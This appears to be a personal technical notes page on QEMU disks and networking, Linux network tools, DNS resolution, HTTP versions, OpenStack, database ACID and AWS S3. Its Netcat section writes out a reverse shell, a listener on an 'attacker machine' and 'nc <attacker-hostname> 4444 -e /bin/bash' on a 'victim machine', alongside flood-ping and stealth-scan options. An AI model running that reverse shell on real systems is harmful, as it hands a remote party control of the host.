Qemu

CLI

To run Qemu in a terminal, use -nographic or -display curses.

Resources

Qemu images

Qemu disk images

There are two types of images:

  • raw: faster, static, takes up the whole allocated space (unless sparse); can be created with dd or fallocate.
  • qcow: less performant, dynamic, copy-on-write, and supports snapshotting. Does not play well with Btrfs (COW on top of COW).

  • Overlay storage images are a way to create images from other images.
  • Qemu images can be resized or converted to other formats with qemu-img.
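The simplicity of the raw format can be sketched in a few lines (a hedged illustration using only Python's standard library; `qemu-img create -f raw disk.img 1G`, fallocate, or truncate all produce an equivalent file):

```python
import os
import tempfile

# A raw image is just a plain file. Truncating creates a sparse file:
# the logical size is 1 GiB, but almost no blocks are allocated yet
# (roughly what `qemu-img create -f raw disk.img 1G` does).
path = os.path.join(tempfile.mkdtemp(), "disk.img")
with open(path, "wb") as f:
    f.truncate(1024 ** 3)

logical_size = os.path.getsize(path)        # 1 GiB as seen by the guest
allocated = os.stat(path).st_blocks * 512   # bytes actually on disk
```

Writing data into the file allocates real blocks, which is why a fully written raw image "takes the whole allocated space".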

GuestFS tools


qemu-img reference

Qemu networking

VirtualBox VS Qemu Networking

The following are VB Networking modes and how we can implement them in Qemu:

  • Not Attached: in Qemu this is done by specifying -nic none.
  • NAT: this is the default for VB, and it is how Qemu user networking (SLIRP) is set up.
    • The hypervisor NATs the traffic from the guest to the outside world.
    • By default the host is reachable from the guest at the address 10.0.2.2.
    • The guest is not reachable from the host by default. Access can be achieved through port forwarding.
    • -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::2222-:22
    • In Qemu's user-mode networking, a userspace networking stack is loaded into the qemu process. It is a standalone implementation of IP, TCP, UDP, DHCP, TFTP, etc.
  • NAT Networks: this creates a network similar to a home router; the services in the network can reach each other and the internet, but they cannot be reached from outside hosts.
    • This is done using bridges and TAP interfaces.
    • We create a bridge with a static IP address, plug the VMs' NICs into it, and NAT from it. Finally we run dnsmasq on it to act as a DHCP and DNS server.
  • Bridged networking: the same as the previous, but more flexible.
    • In Qemu the tap device is bridged to a physical network interface so the machines are accessible from the host network.
    • -device virtio-net,netdev=network0 -netdev tap,id=network0,ifname=tap0,script=no,downscript=no
  • Internal networking: same as bridged, but the VMs are not accessible from the host and vice versa.
    • This is achieved in Qemu by dropping all the traffic to the bridge on the INPUT iptables chain.
    • iptables -I FORWARD -m physdev --physdev-is-bridged -j ACCEPT
    • We either need to assign static IPs or run a DHCP server in one of the VMs.
  • Host-only networking: a hybrid between internal and bridged networking: the VMs can't be accessed by machines on the host's network, but can be accessed by the host itself.
    • In Qemu the bridge is created and assigned an IP, and no traffic destined to it is dropped, but it is not connected to any physical interface.
  • Generic networking: VDE networks.

More on Qemu networking can be found in the Arch wiki, and more on VB networking in their manual.

Qemu networking CLI options

  • Qemu provides two different entities to configure networking for a VM:
    1. The frontend: the NIC that the guest sees. It can either be a virtualized network card (e1000) or a paravirtualized device (virtio-net).
    2. The backend: the interface used by Qemu to exchange network packets with the outside world (other VMs, the host, the internet, ...).
  • There are 3 options to create network entities: -nic, -netdev, and -net.
  • -net can create either a frontend or a backend.
    • All frontends and backends created using -net are connected to a hub (previously named vlan). This way all of them receive each other's packets.
    • It cannot use vhost acceleration.
    • Qemu's -net is deprecated in favor of -device + -netdev, or -nic for quick and less verbose network configurations.
  • -netdev can only create backends and needs to be coupled with -device.
    • It does not create a shared hub; every NIC is connected to its backend only, which means packets are not shared between interfaces.
    • We can still connect to a hub using -netdev hubport; however, a hub is no longer required for most use cases.
    • -device can only be used with pluggable NICs. Boards with on-board NICs can't be configured with -device.
  • -nic can create both a frontend and a backend at the same time.
    • It is easier to use than -netdev, can configure on-board NICs, and does not place a hub between interfaces.

More information here

More on Qemu networking

  • In unprivileged setups, Qemu VMs running with user-mode networking can access each other using the socket backend.

More on Qemu networking and socket mode

Networking

Linux Networking

Network interface Management

1. Wired Interfaces

There are two main subcommands: addr (Layer 3) and link (Layer 2). They expose a CRUD-style interface; check the help using ip <command> help. The ip commands replaced the ifconfig commands.

  • ip l CRUD:
ip link show
ip link show dev <interface-name>
ip link add [link <dev-name>] name <interface-name> type <link-type> # Add a virtual link
ip link del dev <interface-name>
  • ip a CRUD:
ip addr show
ip addr show dev <interface-name>
ip addr add dev <interface-name> <ip-address>/<mask>
ip addr del dev <interface-name> <ip-address>/<mask>

2. Wireless Interfaces

iw replaced iwconfig and iwlist. iw dev is used to manage the wireless interfaces, scan for available networks, connect to a network (using its SSID), etc. iw phy manages the hardware device.

iw dev wlan0 link # information about the link 
iw dev wlan0 info # information about the interface
iw dev wlan0 scan
iw dev wlan0 connect <SSID>

3. ARP protocol

ip [-s] neigh is used to display the neighbor list, a.k.a. the ARP cache/table (-s adds verbose statistics). ip n offers a CRUD-like interface (add, del, show, replace) to manage the ARP cache:

ip n add <ip-addr> lladdr <mac-addr> dev <interface-name>
ip n del <ip-addr> dev <interface-name>
ip n show dev <interface-name>
ip n replace <ip-addr> lladdr <mac-addr> dev <interface-name> # Replace or add a MAC for the IP address

Notes

  • Difference between link, device, and interface (source): in the Linux context they all refer to the kernel's netdev, but in networking they can mean different things:
    • Link: the actual circuit, path, and/or cable between ports.
    • Device: either the entire system, or the blob within it that creates the electrical (optical) signal.
    • Interface: the logical middleground between the two, often in the context of the OS (eth0, f0/0, etc.)

TCP/IP

1. Routing

Iproute2 handles routing via the ip route command:

ip route add <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route del <network-ip-address>/mask via <router-ip-address> dev <interface-name>
ip route add default via <default-gateway-ip>
ip route add prohibit <network-ip-address>/mask # blocks route and sends back an ICMP message
ip route add blackhole <network-ip-address>/mask # blocks route silently

2. TCP ports

Iproute replaces netstat with ss

ss -lntp
# -l: listening sockets, -n: numeric ports/addresses, -t: tcp, -p: show processes using the socket

lsof is very useful too: it shows open files per user and per process.

lsof -i4 # list all IPv4 network connections
lsof -p <pid> # list by PID
lsof -u <username> # list by user (prefix the user with ^ for negation)
lsof -i <protocol>:<port> # list by protocol and port
lsof <file-path> # processes that have a file open

3. TCPDump

Tcpdump performs packet monitoring and capture on any network interface (even Bluetooth, loopback, ...).

tcpdump -D # list interfaces available for capture
tcpdump -i <interface-name> -c <count> -w <file-path> # capture packets on an interface and save the results to a file

TCPDump Cheatsheet

| Option | Description |
| --- | --- |
| -D | List interfaces available for capture |
| -i eth0 | Capture packets on an interface, or on all interfaces (any) |
| -c | Capture a specified count of packets |
| -n | Disable hostname resolution |
| -nn | Disable protocol, port, and hostname resolution |
| -i any protocol | Capture packets by protocol on all interfaces |
| -i any host 10.0.2.18 | Capture packets by host on all interfaces |
| -i any src/dst 10.0.2.10 | Capture packets by source or destination address on all interfaces |
| -A | View packet content in ASCII |
| -X | View packet content in hex and ASCII |
| -w file_name.pcap | Save the output of tcpdump to a file |
| -r file_name.pcap | Read packets from a file |

4. Port Scanning with Nmap

Nmap is a port scanner. It supports many scanning modes.

nmap -iL <host-file> # scan all hosts in a file
nmap -sn <hostname> # Ping scan, host discovery
nmap -Pn <hostname> # Skips host discovery, Only scan the ports.
nmap -r <hostname> # Scan consecutively, don't randomize
nmap -F <hostname> # Perform a fast scan, only common ports
nmap -p <port1,...,portn> <hostname> # select ports to scan
nmap -sU <hostname> # scan UDP ports instead of TCP (the default)
nmap -sS <hostname> # TCP SYN scan (stealthy), quick and unintrusive: starts the TCP handshake and never completes it
nmap -sT <hostname> # TCP connect scan

5. Interacting with remote hosts

ping sends ICMP packets to a destination IP. Very useful for troubleshooting and discovery.

Ping Cheatsheet

| Option | Description |
| --- | --- |
| hostname | Send a stream of ICMP packets to a hostname |
| 10.0.2.10 | Send a stream of ICMP packets to an IP address |
| -c 5 10.0.2.10 | Send a specified number of packets |
| -s 100 10.0.2.10 | Alter the size of the packets |
| -i 3 10.0.2.10 | Change the interval between packets |
| -q 10.0.2.10 | Only show the summary information |
| -w 5 10.0.2.10 | Set a timeout after which ping stops sending packets |
| -f 10.0.2.10 | Flood ping: send packets as fast as possible |
| -p ff 10.0.2.10 | Fill the packet with the given pattern; ff fills it with ones |
| -b 10.0.2.10 | Send packets to a broadcast address |
| -t 10 10.0.2.10 | Limit the number of network hops (TTL) |
| -v 10.0.2.10 | Increase verbosity |

6. Netcat

Netcat is also very useful in this regard, since it writes and reads data across networks.

nc -l <port> # listen on a specific port
nc -u -l <port> # listen on a UDP port
nc -v -z <ip-address> <port> # report connection status (port scan)

# Reverse Shell
nc -lvp 4444 # On Attacker machine open a connection
nc <attacker-hostname> 4444 -e /bin/bash # On the victim machine

# File Transfer
nc -lvp 4444 > test.txt
nc <hostname> 4444 < test.txt

# Send GET Request to a webserver
printf "GET / HTTP/1.0\r\n\r\n" | nc <hostname> <port>

Network Configurations

1. RHEL Based systems (Old)

The config files used to live in /etc/sysconfig/network-scripts

| Option | Description |
| --- | --- |
| TYPE=Ethernet | The type of network interface device (e.g., Ethernet, Wi-Fi) |
| BOOTPROTO=none | Specify the boot protocol (none, dhcp, bootp) |
| DEFROUTE=yes | Use this interface as the default route for IPv4 traffic (yes, no) |
| IPV6_DEFROUTE=yes | Use this interface as the default route for IPv6 traffic (yes, no) |
| IPV4_FAILURE_FATAL=no | Disable the device if the IPv4 configuration fails (yes, no) |
| IPV6_FAILURE_FATAL=no | Disable the device if the IPv6 configuration fails (yes, no) |
| IPV6INIT=yes | Enable or disable IPv6 on the interface (yes, no) |
| IPV6_AUTOCONF=yes | Enable or disable IPv6 autoconf configuration (yes, no) |
| NAME=eth0 | Specify a name for the connection |
| UUID=... | Specify the unique identifier for the device |
| ONBOOT=yes | Activate the interface on boot (yes, no) |
| HWADDR=00:00:00:00:00:00 | Specify the MAC address of the interface |
| IPADDR=10.0.1.10 | Specify the IPv4 address |
| PREFIX=24 | Specify the network prefix |
| NETMASK=255.255.255.0 | Specify the netmask |
| GATEWAY=10.0.1.1 | Specify the gateway |
| DNS1=192.168.123.3 | Specify a DNS server |
| DNS2=192.168.123.2 | Specify another DNS server |
| PEERDNS=yes | Modify the /etc/resolv.conf file (yes, no) |

2. Debian Based Systems (Old)

All network interface configurations go into /etc/network/interfaces, with drop-in files under /etc/network/interfaces.d. Interfaces whose stanzas begin with auto are brought up on system startup.
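A minimal, hypothetical /etc/network/interfaces example (interface names and addresses are illustrative):

```
# /etc/network/interfaces
auto lo
iface lo inet loopback

# Brought up at boot because of the "auto" line.
auto eth0
iface eth0 inet static
    address 192.168.1.10/24
    gateway 192.168.1.1

# DHCP variant:
# auto eth1
# iface eth1 inet dhcp
```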

3. Distro agnostic config files

In addition to the distro related network configuration files, here are the most common remaining ones:

  • /etc/hosts: Name to IP Address associations
  • /etc/resolv.conf: DNS resolver configuration
  • /etc/sysconfig/network: Global network settings
  • /etc/nsswitch.conf: The Name Service Switch config file, used to determine the sources from which to obtain name-service information, and their order.
  • /etc/hostname: holds the machine hostname (can be set/shown using hostname or hostnamectl)
  • /etc/hosts.deny and /etc/hosts.allow: Allow or block access to certain services from remote clients (Can use ALL to block or allow all). For example to only allow hosts from 10.0.3.* network to connect to our host via SSH we can do the following
# /etc/hosts.deny
sshd : ALL

# /etc/hosts.allow
sshd : 10.0.3.*

4. Network Manager

  • Network Manager vs ifcfg-* Options
| nmcli con mod | ifcfg-* file | Purpose |
| --- | --- | --- |
| ipv4.method manual | BOOTPROTO=none | Set a static IPv4 address |
| ipv4.method auto | BOOTPROTO=dhcp | Automatically set the IPv4 address using DHCP |
| ipv4.addresses "192.168.0.10/24" | IPADDR=192.168.0.10 PREFIX=24 | Set the IPv4 address and prefix |
| ipv4.gateway 192.168.0.1 | GATEWAY=192.168.0.1 | Set the gateway |
| ipv4.dns 8.8.8.8 | DNS1=8.8.8.8 | Specify a DNS server |
| autoconnect yes | ONBOOT=yes | Automatically activate this connection on boot |
| con-name eth0 | NAME=eth0 | Specify the name of the connection |
| ifname eth0 | DEVICE=eth0 | Specify the interface for the connection |
| 802-3-ethernet.mac-address ... | HWADDR=... | Specify the MAC address of the interface for the connection |
  • nmcli commands
| Command | Purpose |
| --- | --- |
| nmcli dev status | Show the status of all network interfaces |
| nmcli con show | List all connections |
| nmcli con show name | List the current settings for the connection name |
| nmcli con add con-name name ... | Add a new connection named name |
| nmcli con mod name ... | Modify a connection |
| nmcli con reload | Reload the network configuration files |
| nmcli con up name / nmcli con down name | Activate or deactivate a connection |
| nmcli dev dis dev | Deactivate and disconnect the current connection |
| nmcli con del name | Delete the connection and its configuration file |

Network Diagnostics and Troubleshooting

1. Traffic analysis with Traceroute and MTR

Traceroute tracks the route taken by packets from source to destination. The traceroute command uses UDP packets by default, but can use ICMP ECHO (-I) or TCP SYN (-T) probes. Tracepath is a modern alternative with fewer fancy options.

traceroute -n -q 2 -I www.google.com # Don't resolve hostname, use ICMP and send only 2 probes per host.

MTR, on the other hand, uses ICMP ECHO by default, but this can be changed using -T (TCP) or -u (UDP). Also, MTR is a TUI and records more statistics.

mtr -r -c 3 -f 4 www.google.com # Generate a report instead of the TUI (3 runs, start at the 4th hop)
mtr -run4 -c 3 www.google.com # Report, unresolved IPv4 addresses only, use UDP probes
mtr -w -c 3 www.google.com # Generate a wide report (IP addresses/hostnames not truncated)

2. Network logs

Debian Based systems use /var/log/syslog for logging system logs, while RHEL based use /var/log/messages.

Another source for logs is systemd's journal, which is stored in a binary format and can be consulted using the journalctl utility. In addition to all of that, we have dmesg, which reads messages from the kernel ring buffer.

Notes

  • Traceroute and MTR are very useful to troubleshoot and diagnose any network traffic problems.
  • Changing between UDP, ICMP and TCP probes can be helpful to avoid routers filtering.
  • The kernel ring buffer is a data structure in the Linux kernel that stores log messages generated by the kernel. It is a cyclic buffer that holds the most recent log messages and can be read through the /proc/kmsg file or by using the dmesg command. The kernel ring buffer provides a quick and efficient way for system administrators to diagnose and troubleshoot problems with the Linux system.

Resources

DNS

DNS Resolution process

  1. The DNS resolver looks in its DNS cache.
  2. The DNS resolver breaks iduoad.com into [., com., iduoad.com.].
  3. The DNS resolution starts at ., the root domain, whose nameserver IP addresses are already known to the DNS resolver.
  4. The DNS resolver queries a root nameserver. => returns (the address of the authoritative nameserver of com.)
  5. The DNS resolver queries the com. authoritative nameserver. => returns (the address of the authoritative nameserver of iduoad.com.)
  6. The DNS resolver queries the authoritative nameserver of iduoad.com. and gets the latter's IP address.

A DNS request using dig utility:

# To visualize the entire process we run the following command
dig +trace iduoad.com

A DNS response looks like the following:

iduoad.com.		1799	IN	CNAME	iduoad.netlify.app.
# REQUEST    TTL(for cache)    IN    Query TYPE    Response

DNS and Layer 4 protocols

Multiplexing/Demultiplexing and UDP in linux

  • Multiplexing: When a client makes a DNS request, after filling the necessary application payload, it passes the payload to the kernel via sendto system call.
  • Demultiplexing: When the kernel on server side receives the packet, it checks the port number and queues the packet to the application buffer of the DNS server process which makes a recvfrom system call and reads the packet.
  • UDP is one of the simplest transport layer protocols: it does only multiplexing and demultiplexing. Another common transport layer protocol, TCP, does a bunch of other things like reliable communication, flow control, and congestion control.
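The bullets above can be sketched with a UDP exchange on the loopback interface (Python standard library; the payload and names are illustrative):

```python
import socket

# "Server": the kernel demultiplexes incoming datagrams onto this
# socket's receive queue based on the destination port.
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(("127.0.0.1", 0))          # kernel picks a free port
server.settimeout(5)
port = server.getsockname()[1]

# "Client": sendto hands the application payload to the kernel,
# which multiplexes it down the stack toward the destination port.
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.settimeout(5)
client.sendto(b"who is iduoad.com?", ("127.0.0.1", port))

data, addr = server.recvfrom(2048)     # server reads its queue
server.sendto(data.upper(), addr)      # reply to the client's port

response, _ = client.recvfrom(2048)
client.close()
server.close()
```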

TCP/UDP throughput and Kernel buffer size

  • If the underlying network is slow and the UDP layer can't queue packets down to the network layer, the sendto syscall will block until the kernel frees up some of its buffer. Increasing the write buffer sizes via the sysctl variables net.core.wmem_max and net.core.wmem_default provides some cushion to the application against the slow network.
  • The same thing happens on the server side. If the receiver process is slow (slower than the kernel), the kernel has to drop packets that can't be queued because the buffer is full. Since UDP doesn't guarantee reliability, these dropped packets cause data loss unless tracked by the application layer. Increasing the sysctl variables net.core.rmem_default and net.core.rmem_max can provide some cushion for slow applications against fast senders.
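These buffer limits surface in applications through socket options. This sketch (an illustration, not tuning advice) requests a larger receive buffer and reads back what the kernel actually granted:

```python
import socket

# The kernel caps SO_RCVBUF at net.core.rmem_max; on Linux it also
# doubles the requested value to account for bookkeeping overhead,
# so the granted size rarely equals the request exactly.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
requested = 256 * 1024  # ask for a 256 KiB receive buffer
sock.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, requested)
granted = sock.getsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF)
sock.close()
```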

DNS Resolution in Linux

  1. When we visit a website, the browser first checks whether the domain is already stored in its DNS cache.
  2. If the domain name is not in the browser's DNS cache, the browser calls the gethostbyname (or getaddrinfo) libc function.
  3. Linux looks in /etc/nsswitch.conf to determine the order it will follow when trying to resolve the domain name to an IP address.
  4. Let's say the NSS file contains the entry hosts: files dns.
  5. The OS will look in the /etc/hosts file first for a match of the domain name.
  6. If none is found in the hosts file, it will use the nss-dns plugin to make a DNS request to the DNS resolvers listed in /etc/resolv.conf (in order, from top to bottom).

The DNS resolvers are populated by DHCP or statically configured by an administrator.
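The lookup path above can be observed without touching the network by resolving a name that normally lives in /etc/hosts (a minimal sketch; it assumes the conventional localhost entry is present):

```python
import socket

# With the usual "hosts: files dns" NSS configuration, "localhost"
# is answered from /etc/hosts (the "files" source) and the lookup
# never reaches a DNS resolver from /etc/resolv.conf.
infos = socket.getaddrinfo("localhost", 80, proto=socket.IPPROTO_TCP)
addresses = {info[4][0] for info in infos}
```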

nsswitch.conf file

The /etc/nsswitch.conf file is used to configure which services are to be used to determine information such as hostnames, password files, and group files.

An example of the /etc/nsswitch.conf

# Name Service Switch configuration file.
# See nsswitch.conf(5) for details.

passwd: files systemd
group: files [SUCCESS=merge] systemd
shadow: files systemd
gshadow: files systemd

publickey: files

hosts: mymachines resolve [!UNAVAIL=return] files myhostname dns
networks: files

protocols: files
services: files
ethers: files
rpc: files

netgroup: files

The syntax is the following:

database_name: (service_specifications...[STATUS=ACTION])
  • database_name: the database we will be looking in.
  • service_specification: where we'll be looking. These depend on the presence of shared libraries (e.g. files, db, ldap, winbind, ...).
  • STATUS: a resulting status for a service_specification; if it occurs, the corresponding ACTION is taken.

In the previous example:

  • for passwd, group, shadow and gshadow the system will look in the files first then it will fallback to systemd.
  • for group, if the lookup in the files succeeds, the processing will continue to systemd, and the member lists of the groups found in both sources will be merged.
  • for hosts it will use mymachines plugin, then resolve. If resolve is available it will return (stop the lookup) otherwise it will continue to files, myhostname and finally dns.
  • for other services it will use files.

NSS Plugins

There are many NSS (Name Service Switch) plugins that are used to resolve names to ips. Here are some examples:

  • nss-mymachines: provides hostname resolution for the names of containers running locally that are registered with systemd-machined.service.
  • nss-myhostname: provides hostname resolution for the locally configured system hostname as returned by gethostname.
  • nss-resolve: resolves hostnames via the systemd-resolved local network name resolution service. It replaces the nss-dns plug-in module that traditionally resolves hostnames via DNS.

Linux DNS utilities: dig vs nslookup

  • dig uses the OS resolver libraries. nslookup uses its own internal ones.
  • Internet Systems Consortium (ISC) has been trying to get people to stop using nslookup.
  • nslookup was considered deprecated until BIND 9.9.0a3 release.
  • Source: StackOverflow thread

DNS applications

HTTP

HTTP/1.0 vs HTTP/1.1 vs HTTP/2.0

  • HTTP/1.0 uses a new TCP connection for each request.
  • HTTP/1.1 allows only one in-flight request per open TCP connection, but connections can be reused for multiple requests, one after another.
  • HTTP/2.0 can have multiple in-flight requests on the same TCP connection.
  # This will exit after this single request.
  telnet iduoad.com 80
  GET / HTTP/1.0
  HOST:iduoad.com
  USER-AGENT: curl

  # We can reuse the same connection for multiple requests.
  telnet iduoad.com 80
  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl

  GET / HTTP/1.1
  HOST:iduoad.com
  USER-AGENT: curl
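The HTTP/1.1 connection reuse shown above can also be demonstrated against a throwaway local server (Python standard library; the handler, response body, and port choice are illustrative):

```python
import http.client
import http.server
import threading

# Serve two requests over one TCP connection: keep-alive is the
# HTTP/1.1 default when the response length is known.
class Handler(http.server.BaseHTTPRequestHandler):
    protocol_version = "HTTP/1.1"      # enables persistent connections
    def do_GET(self):
        body = b"ok"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)
    def log_message(self, *args):      # silence request logging
        pass

server = http.server.HTTPServer(("127.0.0.1", 0), Handler)
threading.Thread(target=server.serve_forever, daemon=True).start()

conn = http.client.HTTPConnection("127.0.0.1", server.server_address[1])
conn.request("GET", "/")
first = conn.getresponse().read()
conn.request("GET", "/")               # reuses the same TCP connection
second = conn.getresponse().read()
conn.close()
server.shutdown()
```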

Cloud

Openstack

Installation

Kolla Ansible

The Kolla Ansible inventory consists of 5 groups:

  1. control
  2. compute
  3. network
  4. storage
  5. monitoring

source

Networking

Openstack requires at least 2 network interfaces, in Kolla they are created using:

  • network_interface: Not used on its own but most other services default to using it.

  • neutron_external_interface: Required by Neutron and used for flat networking and tagged vlans

  • Openstack networks are Layer 2.

A network is the central object of the Neutron v2.0 API data model and describes an isolated Layer 2 segment. In a traditional infrastructure, machines are connected to switch ports that are often grouped together into Virtual Local Area Networks (VLANs) identified by unique IDs. Machines in the same network or VLAN can communicate with one another but cannot communicate with other networks in other VLANs without the use of a router.

IP address in openstack

  • To create a public IP address in OpenStack (a floating IP) we use openstack floating ip create docs
  • To assign a floating IP address to a machine we use openstack server add floating ip docs

Create a Test VM

openstack server create --flavor 1 --image cirros  --network <network-id>  test_vm

Networking

Creation

The Neutron workflow (when booting a VM instance)

  1. The user creates a network.
  2. The user creates a subnet and associates it with the network.
  3. The user boots a virtual machine instance and specifies the network.
  4. Nova interfaces with Neutron to create a port on the network.
  5. Neutron assigns a MAC address and IP address to the newly created port using attributes defined by the subnet.
  6. Nova builds the instance's libvirt XML file, which contains local network bridge and MAC address information, and starts the instance.
  7. The instance sends a DHCP request during boot, at which point the DHCP server responds with the IP address corresponding to the MAC address of the instance.

Deletion

  1. The user destroys the virtual machine instance.
  2. Nova interfaces with Neutron to destroy the ports associated with the instances.
  3. Nova deletes local instance data.
  4. The allocated IP and MAC addresses are returned to the pool.

Console

There are three remote console access methods commonly used with OpenStack:

  • novnc: An in-browser VNC client implemented using HTML5 Canvas and WebSockets
  • spice: A complete in-browser client solution for interaction with virtualized instances
  • xvpvnc: A Java client offering console access to an instance

Resources

Databases

ACID

Atomicity

Definition

A transaction is treated as a single "atom." Either every statement in the transaction succeeds, or the entire thing is rolled back, leaving the database unchanged.

Implementation

  • MySQL: Uses the Undo Log to revert changes if a transaction fails. If you use the InnoDB engine (the default), you get this protection.
  • Postgres: Uses a combination of WAL and a system called MVCC (Multiversion Concurrency Control). It essentially tracks the state of data "versions" to ensure it can discard uncommitted changes instantly.

Consistency

Definition

Consistency ensures that a transaction takes the database from one valid state to another, maintaining all predefined rules (constraints, cascades, triggers).

Implementation

There are two levels of consistency:

  1. Data consistency
    • You have multiple views of your data (e.g., via foreign keys): will a change in one view propagate to the other views?
    • This is achieved by
      • The user (database designer)
      • Referential integrity (foreign keys, cascade ...)
      • Atomicity and Isolation.
  2. Read consistency
    • If TX1 updates a field, TX2 should read the new value.
    • SQL databases can guarantee read consistency in the case of a single server.
    • Horizontal scaling or caching leads to read inconsistency => eventual consistency.

Isolation

Definition

This ensures that concurrent transactions (multiple people using the database at once) don't interfere with each other. It makes it appear as if transactions are running sequentially.

There are four main isolation levels you should know:

  • Read Uncommitted: Can see "dirty" (uncommitted) data. -> Dirty reads
  • Read Committed: (Postgres Default) You only see data once it's saved. -> Non-Repeatable Reads
  • Repeatable Read: (MySQL Default) If you read a row twice in one transaction, the data won't change even if someone else updated it. -> Phantom reads
  • Serializable: The strictest level; transactions behave as if they are the only ones running. -> Solves isolation but is very expensive.

There is a 5th, non-standard level called Snapshot: like Repeatable Read, but it only sees transactions committed before the current transaction started.
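A small demonstration of isolation using SQLite, whose default level is Serializable: a second connection never observes another connection's uncommitted ("dirty") write (file path and table are illustrative):

```python
import os
import sqlite3
import tempfile

path = os.path.join(tempfile.mkdtemp(), "demo.db")
writer = sqlite3.connect(path, isolation_level=None)  # manual transactions
reader = sqlite3.connect(path, isolation_level=None)
writer.execute("CREATE TABLE accounts (balance INTEGER)")

writer.execute("BEGIN")
writer.execute("INSERT INTO accounts VALUES (100)")
# The row is uncommitted: the reader still sees an empty table,
# so no dirty read is possible.
before_commit = reader.execute("SELECT COUNT(*) FROM accounts").fetchone()[0]
writer.execute("COMMIT")
after_commit = reader.execute("SELECT COUNT(*) FROM accounts").fetchone()[0]
writer.close()
reader.close()
```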

Implementation

Both Postgres and MySQL use MVCC and Locking to implement isolation. The difference is that Postgres stores old versions of the rows in the tables and MySQL stores the old versions of the rows in the UNDO logs and includes a hidden DB_ROLL_PTR in each row that links it to its previous version in the undo log, creating a version chain.

MySQL calls Snapshots Read Views. New Read Views are created at each SELECT statement in READ COMMITTED mode and on the first SELECT on REPEATABLE READ.

MySQL then prevents Phantoms in REPEATABLE READ using Gap Locks and Next-Key Locks.

  • Record Lock: Locks the actual index record.
  • Gap Lock: Locks the "gap" between index records.
  • Next-Key Lock: A combination of a record lock and a gap lock on the space before that record.

| Database | OSS / Closed | Default Level |
| --- | --- | --- |
| PostgreSQL | OSS | Read Committed |
| MySQL (InnoDB) | OSS | Repeatable Read |
| MariaDB | OSS | Repeatable Read |
| Oracle DB | Closed | Read Committed |
| SQL Server | Closed | Read Committed |
| SQLite | OSS | Serializable (due to simple locking) |

Durability

Definition

Once a transaction is committed, it remains committed—even in the event of a system crash or power failure.

Implementation

Both databases use a Write-Ahead Log (WAL).

  • MySQL: Calls this the Redo Log.
  • Postgres: Calls this the WAL.

The database writes the intent of the change to a log file on the disk before updating the actual data files. If the system crashes, it simply replays the log to recover the data.
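A toy sketch of the write-ahead idea (not how MySQL or Postgres actually structure their logs): record each change durably in a log before touching the data files, and rebuild state by replaying the log after a crash:

```python
import json
import os
import tempfile

d = tempfile.mkdtemp()
wal_path = os.path.join(d, "wal.log")

def commit(key, value):
    # Append the intended change to the log and fsync it: the change
    # is durable once fsync returns, before any data file is touched.
    with open(wal_path, "a") as f:
        f.write(json.dumps({"key": key, "value": value}) + "\n")
        f.flush()
        os.fsync(f.fileno())

def recover():
    # After a crash, replay every committed change in log order.
    state = {}
    with open(wal_path) as f:
        for line in f:
            rec = json.loads(line)
            state[rec["key"]] = rec["value"]
    return state

commit("balance", 100)
commit("balance", 250)
# Simulate a crash before the data files were ever updated:
# replaying the WAL still reconstructs the committed state.
state = recover()
```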

Postgres - ACID

Atomicity

AWS

AWS S3

General Overview

  • Object storage service for scalable, durable data storage.
  • 99.999999999% (11 9's) durability; 99.99% availability for most classes.
  • Unlimited storage; pay for usage (storage, requests, data transfer).
  • Global via multi-Region access; integrates with AWS services (EC2, Lambda, etc.).
  • Data Model:
    • Bucket – top-level container (unique name, global namespace)
    • Object – file + metadata
    • Key – full path to object within a bucket
  • There is no concept of directory in General-purpose S3.
  • A single upload is limited to 5 GB; for objects larger than 5 GB, "multipart" upload must be used.
  • Objects can have key-value metadata pairs and key-value tags (useful for security/lifecycle rules).

Storage Classes

| Class | Use Case | Durability | Availability | Retrieval Time | Minimum Storage Duration | Retrieval Fee |
| --- | --- | --- | --- | --- | --- | --- |
| S3 Standard | Frequent access | 11 9s | 99.99% | Instant | None | No |
| S3 Intelligent-Tiering | Unknown access patterns | 11 9s | 99.9–99.99% | Instant | None | No |
| S3 Standard-IA | Infrequent access | 11 9s | 99.9% | Instant | 30 days | Yes * |
| S3 One Zone-IA | Non-critical infrequent data | 11 9s | 99.5% | Instant | 30 days | Yes |
| S3 Glacier Instant Retrieval | Rarely accessed, quick retrieval | 11 9s | 99.9% | ms | 90 days | Yes |
| S3 Glacier Flexible Retrieval | Archive w/ minutes–hours access | 11 9s | 99.99% | minutes–hours | 90 days | Yes |
| S3 Glacier Deep Archive | Long-term cold storage | 11 9s | 99.99% | hours (12h typical) | 180 days | Yes |

* : Retrieval is priced per GB.

Glacier Retrieval Options

| Tier | Flexible Retrieval | Deep Archive |
| --- | --- | --- |
| Expedited | 1–5 minutes | N/A |
| Standard | 3–5 hours | 12 hours |
| Bulk | 5–12 hours | 48 hours |

Versioning

Lifecycle rule actions

Transition rule actions

  • (R1) Transition current versions of objects between storage classes.
    • Storage class transitions (Target storage class).
    • Days after object creation.
  • (R2) Transition noncurrent versions of objects between storage classes.
    • Storage class transitions.
    • Days after objects become noncurrent.
    • Number of newer versions to retain.

Deletion/Expiration rule actions

  • (R3) Expire current versions of objects.
    • Days after object creation
  • (R4) Permanently delete noncurrent versions of objects.
    • Days after objects become noncurrent
    • Number of newer versions to retain - Optional
  • (R5) Delete expired object delete markers or incomplete multipart uploads.
    • Delete expired object delete markers
    • Delete incomplete multipart uploads

Object deletion in a versioned bucket.

  • Delete an object with Show versions off -> Soft Delete -> Delete Marker created and is the current version shadowing all other versions.
  • Delete an object with Show versions on -> Permanent Delete for the chosen version -> if current is deleted the latest non current becomes current.
  • No promotion is supported. If an old version is wanted it should be copied over the latest version to create a new one with the content of the old one.
  • Lifecycle rule actions (R3) creates a delete marker and promotes it as current version.
  • The Expiration rule (R3) only applies to actual object versions, not delete markers.

Replication

Cross-Region Replication (CRR) vs Same-Region Replication (SRR)

| Feature | Details |
| --- | --- |
| Prerequisites | Versioning enabled on both source and destination |
| Replication scope | All objects, prefix, or tags |
| What's replicated | New objects after enabling, metadata, ACLs, tags |
